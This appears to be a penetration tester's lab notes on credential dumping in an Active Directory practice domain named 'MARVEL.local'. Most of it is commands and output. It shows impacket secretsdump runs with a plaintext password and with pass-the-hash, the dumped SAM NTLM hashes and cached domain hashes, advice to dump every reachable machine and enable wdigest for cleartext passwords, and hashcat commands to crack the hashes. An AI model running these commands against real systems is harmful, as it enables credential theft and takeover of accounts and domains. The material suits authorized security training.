secretsdump.py MARVEL.local/fcastle:'Password1'@192.168.218.139What to worry about from output:
- The SAM hashes
- Admin accounts and user accounts, NOT default ones
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
(NO)DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
(NO)WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58aae1f3031535bbb1bc1f63b3c31373:::
frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::- Domain logon hashes
- if you can get them and crack them, you can get password of a domain admin
[*] Dumping cached domain logon information (domain/username:hash)
MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2023-10-05 03:17:32)
MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2023-10-05 02:43:14)- Clear text passwords!
- wdigest
- Windows 7, Windows 8, Windows 2008 Server, R2, Windows Server 2012
- You can enable this on older machines/OS!
- If you turn it on in a PenTest, turn it off before you leave so they don’t get screwed.
USE SECRETS DUMP ON ALL MACHINES YOU HAVE ACCESS TO!!!!
secretsdump.py MARVEL.local/fcastle:'Password1'@192.168.218.140 #on Spidermangives us ANOTHER SAM hash that we did not have before this!
peterparker:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::SECRETS DUMP WITH A HASH:
secretsdump.py administrator:@192.168.218.139 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04fEXAMPLE OF HOW TO MAKE THIS USEFUL:
Cracking the hash(es):
hashcat:
hashcat --help | grep NTLMor any other service/hash than NTLM to find the value for it.
NTLM is 1000 in this case:
hashcat -m 1000 ntlm.txt /usr/share/wordlists/rockyou.txt #-O if on metal(actual PC)-m for module and the value is whatever we found in the step before